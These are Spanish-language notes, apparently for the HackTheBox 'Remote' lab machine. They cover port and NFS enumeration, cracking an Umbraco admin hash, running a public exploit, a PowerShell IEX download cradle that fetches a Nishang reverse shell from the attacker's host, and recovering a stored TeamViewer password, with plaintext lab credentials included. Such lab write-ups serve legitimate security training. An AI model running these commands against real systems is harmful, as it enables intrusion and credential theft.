nmap -A -p- -oA remote 10.129.95.194 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA remote 10.129.95.194

nmap -sU -O -p- -oA remote-udp 10.129.95.194

nikto -h 10.129.95.180:80

ftp 10.129.95.194

whatweb http://10.129.95.194

nmap --script http-enum -p80 10.129.95.194 -oN scan -Pn

Vemos mountd y pensamos que es nfs

showmount -e 10.129.95.194

sudo mount -t nfs 10.129.95.194:/site_backups /mnt/nfs

cd /mnt/nfs && ll

https://10.129.95.194

searchsploit Umbrace

strings Umbraco.sdf | less -S

Vemos el hash de administrador y lo metemos a un archivo hash

john --wordlist=/usr/share/wordlists/rockyou.txt

http://10.129.95.194/umbraco

Vemos la version 7.12.4

searchsploit -m 46153

https://github.com/samratashok/nishang

mv Invoke-PowerShellTcp.ps1 Powershell.ps1

Modificamos el Powershell.ps1 con el puerto 443 y la ip de tu maquina kali

Modificamos las variables login,password y host

admin@htb.local:baconandcheese

python3 46153

nc -lvnp 443

python3 -m http.server 80

![[Pasted image 20211221105737.png]]

Modificamos el shell para poder tener un tamano adecuado.

Cambiamos el valor de cmd

"/c powershell IEX(new-object net.WebClient).downloadString(\'http://10.10.14.135/Invoke-ComptyShell.ps1\')";

Hacemos el stty raw echo; fg y despues enter de nuevo

whoami /priv

tasklist

Y vemos TeamViewer

locate teamviewer | grep metasploit

Vemos la version de TeamViewer que es la 7

Adquirimos la contrasena

(Get-itemproperty -Path .).SecurityPasswordAES

![[Pasted image 20211221121604.png]]

Vemos que la contrasena es !R3m0te!

Creamos un script

crackmapexec smb 10.129.95.194 -u 'Administrator' -p '!R3m0te!'